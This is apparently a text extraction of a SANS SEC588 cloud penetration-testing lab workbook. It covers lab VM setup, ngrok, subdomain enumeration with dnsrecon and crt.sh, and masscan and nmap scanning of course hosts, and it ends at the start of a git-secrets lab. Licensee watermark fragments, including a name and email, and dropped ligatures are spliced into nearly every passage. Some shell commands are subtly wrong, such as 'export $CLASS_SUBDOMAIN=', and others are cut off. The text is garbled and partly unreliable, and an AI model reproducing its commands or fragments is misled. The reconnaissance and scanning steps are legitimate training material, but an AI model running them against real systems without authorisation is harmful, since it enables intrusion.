Professional Documents
Culture Documents
SEC588 Workbook
SEC588 Workbook
SEC588 Workbook
3e1e3b497543e6c11ac8e4188959c93e
20
Workbook
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
se
n
ce
Li
live
THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org
PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT
("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS
COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND
SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS
ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.
3e1e3b497543e6c11ac8e4188959c93e
With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware
subject to the terms of this agreement. Courseware includes all printed materials, including course books
and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by
SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the
20
CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this
20
CLA supersedes any oral or written proposal, agreement or other communication relating to the subject
matter of this CLA.
,
28
pauljones166@outlook_com
ly
BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY
Ju
ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY
CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS
>
INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF
om
POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF.
_c
ok
If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.
23169600 ou
tlo
User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon
all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any
@
purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent,
66
lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written
s1
If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be
ljo
Gregg Harris
deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or
au
SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs
s
rri
presented in this Courseware are the sole property of their respective trademark/registered/copyright
Ha
owners, including:
gg
AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac,
G
iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch,
:
iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro,
To
Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight,
d
There’s an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are
se
live
SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission.
Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.
SEC588_W_F02_02
Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020
© SANS Institute 2020
Welcome to the SANS
3e1e3b497543e6c11ac8e4188959c93e
Security 588 Labs Wiki
20
Welcome to the SANS SEC588 Lab Wiki
, 20
28
pauljones166@outlook_com
This wiki is will serve as your lab guide throughout the class. We will try and keep the labs accessible by allowing
ly
(cut and paste), as well as provide color to your labs.
Ju
>
om
This lab wiki is a work in progress, and is frequently revised by the course authors. This is bene cial to all, since
_c
you continue to get updates to lab material as we improve the quality of the exercises, correct typos, and add
ok
new exercises.
23169600 ou
tlo
The online wiki will always be updated so before class ends make sure you update the wiki prior to leaving class
@
66
so you have the most recent version on your computer. The computer's local wiki will always remain.
s1
ne
Gregg Harris
au
To access the digital edition of the lab wiki from the Slingshot Linux VM, open the Firefox browser. The home
<p
page will display this text, and allow you to navigate to the course lab exercises.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
You should have been provided a Download link in your portal with Day0 Instructions. Please review those
G
Copy over the three virtual machine les over from the USB
Li
3e1e3b497543e6c11ac8e4188959c93e
Once the Section 1 or Day 1 labs are completed you should be able to update the wiki by performing the
following commands:
20
, 20
28
pauljones166@outlook_com
ly
Ju
sec588@slingshot:~$ wiki-updater.sh ()
>
om
_c
ok
That's it! With this one step you will always have the most current lab materials.
Conventions
23169600 @
ou
tlo
66
Italic
Gregg Harris
au
Constant width
rri
Used for terminal output and within paragraphs to refer to tools or other elements such as variables,
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
| (vertical bar)
G
The vertical bar is used to indicate steps necessary for navigating through menus (Edit | Paste)
:
To
d
Code blocks are used to denote output from tools. Content that is bold represents commands you type.
nse
ce
For example:
Li
live
# run_this_command
output from the tool
3e1e3b497543e6c11ac8e4188959c93e
In some cases, the commands you type will call for information that you supply (e.g., that we don't know). In
these cases, the content that you supply is noted in italics: yourinput . Replace yourinput with the information
you supply as described in the exercise.
20
20
This icon signi es a tip, suggestion, warning, or a general note.
,
28
pauljones166@outlook_com
ly
Ju
Course and Lab Feedback
>
om
We are always excited to hear your feedback on the course materials. Is there a bug we need to squash? Do you
_c
have a suggestion for a new awesome tool that we just have to see? Please let us know.
ok
23169600
You can also reach out to Moses Frost directly:
@
ou
tlo
66
Thank you!!
ljo
Gregg Harris
au
_Update: 2020-007
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
20
If you are an ondemand student, you should be getting access to labs for the next 4 months. Check your SANS
Account for continued access.
,
28
pauljones166@outlook_com
ly
Ju
One of the features of this class is an online wiki. You may not have found the online wiki, however, it is
>
recommended that you have the passwords for the wiki when you do get access.
om
_c
For students in class the instructors will provide you the passwords for the wiki and the for the CTF wiki.
ok
23169600
For ondemand students you will nd this in the mylabs portal.
@
ou
tlo
66
VPN has been facilitated to ensure that you are not troubleshooting the environment at home. It is
s1
recommended that you use the VPN provided by the SANS team for a smooth lab experience.
ne
ljo
Gregg Harris
au
Use the VPN con guration found in the My Labs portal for this.
<p
s
Brief Intro
rri
Ha
Walkthrough
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
VMware Required
:
To
d
The Class VM, Slingshot, has been thoroughly testing on VMware. While we understand that some students
se
prefer the use of other hypervisors we do not support them in the class. If they do boot and are able to work, that
n
is perfectly ne, but understand that any problems in the labs you may experience may have to do with an
ce
live
Please ensure you have already downloaded and installed VMware on your system.
If you have not already installed VMware, download and install it now for your platform:
You may be eligible for a free trial period of VMware Workstation Player or VMware Fusion.
3e1e3b497543e6c11ac8e4188959c93e
We do not support the use of other virtualization products such as VirtualBox or Hyper-V in this class. You are
welcome to experiment and try to use these platforms, but we cannot support any problems that may arise.
20
20
Copy the VM Files
,
28
pauljones166@outlook_com
Find the Day0 instructions to mount your ISO into your computer. Using Windows Explorer or Finder (macOS),
ly
Ju
copy the individual virtual machines les to your desktop or another convenient location. This will take several
minutes to complete.
>
om
_c
Launch the Slingshot Linux VM
ok
23169600
Launch the Slinghost Linux VM by opening VMWare Workstation and using the File|Open menu to open the .ovf
tlo
that was decompressed. If VMware indicates that the virtual machine might have been copied or moved. Select I
Copied It when prompted.
@
ou
66
s1
After the Slingshot Linux VM nishes booting, log in with the following username and password:
s
rri
Username: sec588
Ha
Password: sec588
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
That's the last step! You can keep the Slingshot Linux VM running and continue to experiment, or shut it down
:
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
The classroom labs are all available in the Amazon Cloud or in the Azure public cloud. You have been provided
ly
with a copy of the Slingshot Virtual Machine on your USB drive. While we strive to keep the classroom
Ju
requirements to a minimum; this particular class will require that many of the tools you may use outside of class
>
be pre-con gured or pre-setup. Here is a small list of the tools you may wish to use both in the class and outside
om
of class:
_c
ok
Amazon's AWS CLI toolkit
Microsofts Azure CLI toolkit
Git
23169600 @
ou
tlo
Eyewitness
66
PACU
s1
Hydra
ne
Kubernetes Kubelet
Gregg Harris
au
Inguardians Peirates
<p
Postman
s
rri
Many of these tools require python, ruby, or C dependencies to operate we have provided a copy of the virtual
Ha
machine with the precon gured tools. This class designed to provide you with access to a cloud environment,
gg
the instructions in this class will more than likely require you to type commands into a CLI environment. Many of
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
the tools will either be console driven or at times be based on web applications. As such getting familiarity with
G
studentX live
This class will require you to have a 'Random Student Number'. This is noted as: StudentX where X is
replaced with a number. For all students to get your student number:
Once you have done this you can then use the following name for your labs: StudentX where the X is replaced
3e1e3b497543e6c11ac8e4188959c93e
with the number from above. You will append a 1 to the number for example:
20
You would be: Student1191 .
,20
28
pauljones166@outlook_com
What if your IP is below 100? Your Student Number will start with 10 .
ly
Ju
If your IP Address is 23.85.17.91 then your studentX will be: student1091
>
om
Make sure you note this number down.
_c
ok
For OnDemand Students please note:
23169600 @
ou
tlo
On Demand Students will use the following nomenclature: StudentODX
66
s1
ne
Please note that we will be deleting your assets every week on Sunday night and there may be labs that need to
ljo
To use this lab we recommend visiting the Wiki getting started page (Getting-Started.html) . This will walk you
gg
through the Virtual Machine Extraction process. We will be updating the wiki as we go through the lab.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
Try It Yourself
d
se
The following are step by step instructions to extract the virtual machine and gain familiarity with the tools that
n
ce
Walkthrough live
Getting Familiar with the VM
3e1e3b497543e6c11ac8e4188959c93e
Double-click the MATE Terminal and let's get familiar with the shell layout. Most of this Virtual Machines custom
tools will be found in the /opt directory
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Below is a small example of the tools that we will be looking at in this lab and get familiar with throughout the
gg
class.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
|
\opt
|----az
<- root of the tree
<--- optional directory
<- This is the Azure CLI Tools
|----burp <- This is the directory with the Burpsuite tools
|----eyewitness <- This is the eyewitness directory
20
|----masscan <- This is the Massscan Directory
20
|----postman <- This is the Postman Directory
|----pacu <- This is the PACU Directory
,
28
pauljones166@outlook_com
ly
Ju
>
om
Getting familiar with Cloud SDK Cli's.
_c
From the MATE prompt lets change into the az directory to get familiar with the Azure CLI SDK.
ok
23169600 @
ou
tlo
66
$ az help
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
The next SDK we want to get used to working with is the aws sdk. Let's ensure that it works by typing the
following:
20
,20
28
$ aws help
pauljones166@outlook_com
ly
Ju
>
om
You should have the help output appear.
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
se
n
Postman
ce
Li
live
Postman is another tool that we will use in this class, ensuring that it launches would also be a good idea.
Postman will be introduced tomorrow. Change into the /opt directory and open postman.
3e1e3b497543e6c11ac8e4188959c93e
$ cd postman
$ ./Postman
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
di erent and new lab.
23169600 @
ou
tlo
If it opens it should show up like the screenshot below. We will be ok to close this screen as it will be used in a
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
live
Throughout the week we will be discuss ngrok. While we have not introduced it to you yet, we do want to get
ready for this step. In order to do so, let's register with a valid and free ngrok account.
Let us begin by working on getting us a valid ngrok key. To do this open Firefox:
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Navigate to
SIGN UP
23169600 tlo
www.ngrok.com . This will provide you with a page to sign up with a valid ngrok account, slick
@
ou
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Once you are logged in, you can now copy the authtoken in step 3.
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
The next part will to be to add the authtoken and test it. To do this you will need to open a terminal
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
If this worked correctly you should see a screenshot somewhat similar to below:
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
The URL is random for every student. Let's see how we can use this as a webserver
$ cd /tmp
3e1e3b497543e6c11ac8e4188959c93e
$ python -m 'SimpleHTTPServer' 9999
20
20
http://<random-ngrok-hostname>.ngrok.io
,
28
pauljones166@outlook_com
ly
The attack we are going to execute will look like the diagram below, and yes, it is a circular like attack:
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
Replay of this lab
This lab is the beginning point for us to nd and obtain access into our environments. This lab will also ensure
that we have a solid working system that we can use both inside the classroom and potentially outside the
3e1e3b497543e6c11ac8e4188959c93e
classroom. If needed you can shutdown this image and take a snapshot with the image turned o . This will help
you restore to a pristine day 1 image if needed.
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
In day 1 we will have a mission to provide context the importance of reconnaisance at scale. This Wiki needs to
be updated, and you need to discover both the keys to the Wiki as well as the location of our actual labs. We have
20
decided to make this particular lab a treasure hunt to be able to show you how discovery at scale is meant to
,
28
pauljones166@outlook_com
work. This lab will showcase the ability to discover the associated domains that are potentially available to an
environment and then use a custom wordlist to bruteforce the discover of our lab targets. In a later lab we will
ly
Ju
nd additional items that we may be able to use to gain wiki access.
>
om
Requirements for This Lab
_c
ok
23169600 ou
tlo
Please note that SANS understands that some folks will have challenges with their ISP and running scans, for
example this wordlist scan. Even at times when we attempt to hardset your settings in DNS you may nd that
@
scans are not running correctly. As such we are going to attempt to provide workarounds in class. You may nd
66
that you may have to run a VPN connection in order to perform scans.
s1
ne
ljo
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
Gregg Harris
au
connectivity. You will need to be able to load crt.sh (http://crt.sh) . In addition we will be using a wordlist found in
<p
the /home/sec588/files/wordlist directory. You will need to create a le in this directory for hosts.
s
rri
You will also be using a tool called dnsrecon.py that will be the tool to help you discover and enumerate hosts.
Ha
gg
This is nal lab of your on-vm wiki! We need to accomplish and nish the Day 1 labs to get full access to our wiki
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
from hear on out.
: G
To
Try It Yourself
d
nse
ce
This lab requires you to use crt.sh to nd all the subdomains in the crt.sh (http://crt.sh) website.
Li
There is a tool called dnsrecon.py that will be able to parse the crt.sh for you and provide you with a list of
subdomains. You can nd this tool in
$ /opt/dnsrecon
3e1e3b497543e6c11ac8e4188959c93e
Place all of the hosts that are found in the output of dnrecon.py into a le called
/home/sec588/files/workdir/urls.txt . You can do this with your favorite editor. If your not familiar with
Linux then run the following command:
20
$ gedit /home/sec588/files/workdir/urls.txt
,20
Place the entries into this le and save it then close gedit.
28
pauljones166@outlook_com
ly
Ju
Hint: You may want to start with the type of -t crt .
>
om
_c
Walkthrough
ok
Gathering subdomains
23169600 @
ou
tlo
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
$ less /home/sec588/files/wordlists/subdomains.txt
20
20
$ wc -l /home/sec588/files/wordlists/subdomains.txt
,
28
pauljones166@outlook_com
This is a fairly lengthy list as we can see over 70,000 entries. We will discuss the creation of this wordlist on Day
ly
Ju
2. If we attempt to work through this particular list our lab would take over 1 hour! We have shortened this list for
you with the following command:
>
om
_c
head -5000 /home/sec588/files/wordlists/subdomains.txt >
ok
/home/sec588/files/wordlists/subdomains-5k.txt
Now that we are armed with a wordlist let's attempt to try and gure out which one of our domains we will be
s1
Gregg Harris
Run dnsrecon with the following command line arguments:
au
<p
$ cd /opt/dnsrecon
s
rri
Ha
Note that you will see [+] 0 Records Found but will have a list of "Subdomains". With these subdomains you can
gg
take EACH one to nd the subdomain for you to use with class.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
live
3e1e3b497543e6c11ac8e4188959c93e
-d specify a domain, in this case sec588.net
-t specify a type of dnsrecon to run in our case lets check for crt.sh
20
20
This should output several discovered subdomains. The class set of wordlists will be growing every class run so
,
28
pauljones166@outlook_com
do not be surprised with a very large list.
ly
Ju
You may have to bruteforce the rst few subdomains to nd the one for class, it may be the newest one but it
>
could also be a few more down. Just keep this in mind as we work through this particular lab. At the time of
om
writting it was our latest entry which was but in your class it will be di erent.
_c
ok
Figuring out which domain is truly your's
23169600 ou
tlo
How to tell you have the right domain? We have hidden the class identi er in a TXT record. For example,
@
ondemand students can perform the following commands to see if they have the right domain:
66
s1
ne
ljo
Gregg Harris
au
#!/bin/bash ()
<p
nslookup ()
s
/> <class-subdomain>.sec588.net ()
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Alternatively, we included an 'Automated Way' to check to make sure that you have found the appropriate
:
To
subdomain:
d
se
Step 1: Run the command and output the results to a text le:
n
ce
Li
live
$ ./dnsrecon.py --iw -d sec588.net -t crt > ~/files/workdir/dnsrecon-output.txt
Step 2: Run a command to trim down the ‘output.txt’ le to only have the sub-domains and output to a new le,
‘list.txt’
3e1e3b497543e6c11ac8e4188959c93e
Step 3: Run this bash shell one-liner to use ‘dig’ to look for special txt record to nd valid domains
$ for i in $(cat ~/files/workdir/cutlist.txt); do echo "[+] Querying $i"; dig -t txt +short
$i;done
20
20
If the answer is:
,
28
pauljones166@outlook_com
ly
<class-subdomain>.sec588.net text = "ondemand"
Ju
>
You have located the correct subdomain!
om
_c
If you wish to save this as a environment variable this may help you with labs! export $CLASS_SUBDOMAIN=
ok
23169600
<class-subdomain>
tlo
ou
Save this in bash for reboots:
@
echo $CLASS_SUBDOMAIN=<class-subdomain> >> /home/sec588/.bashrc
66
s1
Gregg Harris
au
<p
We will now run the following command to be able to dive into that subdomain and scrape out the individual
s
hosts. If these commands do not work look for the output le example below.
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
/home/sec588/files/workdir/dnsrecon.csv
: G
To
d
n se
ce
Li
live
What do our new commands do?
3e1e3b497543e6c11ac8e4188959c93e
-t use the following modes of operation
and also use the crt.sh scan
brt,crt is used to instruct the system to brute force a wordlist
20
20
--threads increase the number of threads from 1 to in our example 10
,
28
pauljones166@outlook_com
We now see that we have found the following URLs, remember YOUR subdomains will be di erent as they are in
ly
Ju
every class:
>
om
www.<class-subdomain>.sec588.net
_c
ok
wiki.<class-subdomain>.sec588.net
blog.<class-subdomain>.sec588.net
23169600 @
ou
tlo
66
s1
dev.<class-subdomain>.sec588.net
ne
ljo
Gregg Harris
An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab12-dnsrecon-
au
output.txt)
s
rri
Ha
Please make a note of these hostnames we be referring to these hosts throughout the class, you can use any
notepad application you are comfortable with. If you are not sure which one you can use either gedit or
gg
nano .
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
nano /home/sec588/files/workdir/urls.txt
To
d
se
Conclusion
live
In this lab, we have discovered how to enumerate hosts with dnsrecon.py we could also use alternative tools like
gobuster but we will be using this tool in another lab.
The next few labs will be available in print and on our online print!
http://wiki.<class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
For the next lab we will be using the online wiki so that we can x our class wiki
20
20
Often time as attackers we may want to discover subdomains and hosts within those domains but we may run
,
28
into several issues. These could include false postives, shunning, or other false negatives. We need to
pauljones166@outlook_com
understand how we can use tools, weed out the false positives and attempt to determine if there is an
ly
Ju
opportunity for attacker to uncover our sites.
>
om
Bonus (If Time Permits or Homework)
_c
ok
As an additional lab if you wish to nd out about how subdomain enumeration works you may try and use the
following gobuster commands: 23169600 @
ou
tlo
66
/home/sec588/files/wordlists/subdomains-5k.txt
ne
ljo
This is an additional resource will use in another lab for other types of enumeration.
Gregg Harris
au
<p
Additional Resources
s
rri
Ha
Check out SANS SEC542 for additional resources on how to do web enumeration (https://www.sans.org/course/web-
.
gg
app-penetration-testing-ethical-hacking)
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
Portscans at scale can be very critical for discovery of new servers, and more importantly services, that may be
littered across many cloud environments across the internet. This lab will attempt to uncover what exposed
20
ports and by relation what default con gurations we can nd in our cloud environment. This lab will show us the
,
28
pauljones166@outlook_com
strenghts and the limitations of each of our tools. We will also display the methodology that we can employ in
each one of the tools to gather more and more information from our cloud environments.
ly
Ju
>
Recall that we are using the information from our previous lab to generate the target list from this lab. Example:
om
_c
dnsrecon -> provides hostsnames with ips -> feeding into -> massscan and then -> nmap .
ok
Requirements for This Lab 23169600 @
ou
tlo
66
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
s1
connectivity.
ne
ljo
Gregg Harris
This lab will be hosted and found on:
au
<p
http://wiki.<class-subdomain>.sec588.net
s
rri
Ha
Try It Yourself
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
To attempt this class without hints the following methodology should be followed:
: G
To
1. Look at the results from our dnsrecon.py script and locate all the A records that have just an IP address.
d
/home/sec588/files/workdir/ips.txt
3. Run the masscan command with --top-ports
n
ce
4. Run the masscan command with a list of ports such that the following ports are included: 20-25,79-80,8000-
Li
9000,6739,1433,1434,5432,3306,27017
live
5. Follow this up by running nmap with the found ports running a script scan.
6. Attempt to run the script scan with additional tools that match the found the ports that are matched.
7. Save the results in a output directory to be looked at with a visual editor.
Walkthrough
While nmap does a fairly good job of helping automate and locate hosts on a large network, masscan acts a little
di erently. It does not do DNS resolution as an example. Due to the targeting that we must have in our lab we
3e1e3b497543e6c11ac8e4188959c93e
will be providing masscan a very simple set of hosts to scan. To do this, we will look back our previous lab. Let's
gather some hosts to scan.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
$ cd /opt/dnsrecon
n se
ce
live
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D
/home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c
/home/sec588/files/workdir/dnsrecon.csv
Now let's create a list of IP addresses based on these CSV entries, we will provide you with two options to do this,
either one will work, this is based on preference.
$ gedit /home/sec588/files/workdir/ips.txt
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 tlo
We will reference this le in both nmap and masscan using the -iL keyword.
@
ou
Option 2: Use the following awk statement to manually create the le:
66
s1
Gregg Harris
au
What we have done here is taken our list of known IP addresses that we found through DNS reconassaince and
<p
start to scan then. Some of these will be generic AWS services that will yield no value, if you can identify those
s
Masscan
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
We will start our widescale scan with Masscan. We will do this as it is designed to identify the live hosts and their
G
listening ports quickly. Masscan does have some limitations to how it operates. It is design to:
:
To
d
live
We will be using some of these features speci cally to nd what ports are open across our clouds. Let's start by
scanning our ip addresses and seeing what default ports masscan nds:
$ cd /opt/masscan
3e1e3b497543e6c11ac8e4188959c93e
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-1024
This should scan the rst 1024 ports on a host. Let's take a look at we discover.
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Just to review what this does:
23169600 @
ou
tlo
-iL This speci es a le as input
66
s1
-p
ljo
Gregg Harris
au
Masscan in this example will discover a few ports on this host. This particular host has port 80 and 22 open. This
<p
scan is almost the same as our --top-ports feature in masscan as --top-ports is only ports 1-1000. Let's expand
this to include 5,000 ports. The command below is 4 zero's.
s
rri
Ha
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab13-
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
If this command below takes a long time, such as 5 minutes CTRL-C to abort
d
se
live
3e1e3b497543e6c11ac8e4188959c93e
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab13-
masscan-ips3.txt) or the local wiki (http://localhost/wiki/ les/lab13-masscan-ips3.txt)
20
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p20-
20
80,443,445,1433,3306,6379,5432,27017
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
tlo
We now see several ports open that are interesting. Let's follow this up by a very thorough and narrow nmap
@
scan including speci c nse scripts:
66
s1
ne
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab13-
ljo
/home/sec588/files/workdir/scan1
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
-iL
To
d
se
-p
-oA
live
This enables saving the output with the lename of scan1 and will include nmap format, grep format,
and xml format.
What you will notice is that this command will ll up the entire terminal window
3e1e3b497543e6c11ac8e4188959c93e
This scan scrolls o the screen so let's open our scan1.nmap le in gedit.
$ gedit /home/sec588/files/workdir/scan1.nmap
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
1. A Redis database is found but none of the script scans red for it
se
2. A MongoDB database was found and there are databases that are enumerable in the scan results.
n
ce
Li
While this scan is valuable in it's default state it does not check the redis database that you may have noticed
live
was found in this environment. Let's enable some redis and mongodb checks.
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab13-
nmap-scan1.txt) or the local wiki (http://localhost/wiki/ les/lab13-nmap-scan1.txt)
3e1e3b497543e6c11ac8e4188959c93e
20
The command above changes the script function so that we can modify the script scans but have the other
20
options enabled:
,
28
pauljones166@outlook_com
What is our new command option?
ly
Ju
--script=redis*,mongo* Script scan for any script nse les that being with mongo or redis
>
om
_c
-O OS Fingerprint Scan
ok
-sV Version Scan
23169600 @
ou
tlo
Traceroute Enable traceroute on the scan
66
s1
Gregg Harris
au
$ gedit /home/sec588/files/workdir/scan2.nmap
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
We now see that we have both an Enumerable MongoDB and an Enumerable Redis scan.
ljo
Gregg Harris
au
<p
This lab displays the use of nmap and masscan in conjunction, but more importantly, it shows how you can
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Conclusion
d
nse
In this lab we explored using masscan and using nmap. While we didn't do an internet wide scan, import a large
ce
subnet block, or made use of all of masscan features, we did provide a work ow that is actionable in a real world
Li
live
scenario. Masscan can be used in conjunction with nmap to provide for a consistent accurate work ow that will
allow us to discover hosts.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Developers will use source code repository tools to save their work and collaborate between other developers.
ly
Sometimes these devleopers will accidently commit secrets into their code repositories in which they will
Ju
attempt to remove those items, or secrets by just deleting the les that they committed. This is not su cient to
>
remove the les completely from the repository. As such, an attacker that nds the repository can pull the les
om
back and use the key material.
_c
ok
Requirements for This Lab
23169600 @
ou
tlo
In this lab we will be requiring connectivity to our lab environment. Connectivity the 'dev' server will be required
66
Try It Yourself
ljo
Gregg Harris
au
<p
One of the servers that is in our list of hosts may have an exposed le that could provide us with some level of
authentication.
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
1. Enumerate all of the common subdirectories across the hosts.
G
